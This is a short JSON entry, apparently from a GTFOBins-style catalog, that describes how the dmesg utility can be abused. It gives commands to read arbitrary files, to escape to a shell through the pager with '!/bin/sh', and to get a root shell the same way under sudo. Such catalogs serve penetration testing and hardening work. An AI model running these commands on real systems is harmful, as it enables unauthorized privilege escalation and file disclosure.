You cannot select more than 25 topics Topics must start with a letter or number, can include dashes ('-') and can be up to 35 characters long.

22 lines
559 B
JSON

{
"functions": {
"file-read": [
{
"description": "This is not suitable for binary files.",
"code": "dmesg -rF \"[file]\"\n"
}
],
"shell": [
{
"description": "This invokes the default pager, which is likely to be 'less', other functions may apply.",
"code": "dmesg -H\n!/bin/sh\n"
}
],
"sudo": [
{
"description": "This invokes the default pager, which is likely to be 'less', other functions may apply.",
"code": "sudo dmesg -H\n!/bin/sh\n"
}
]
}
}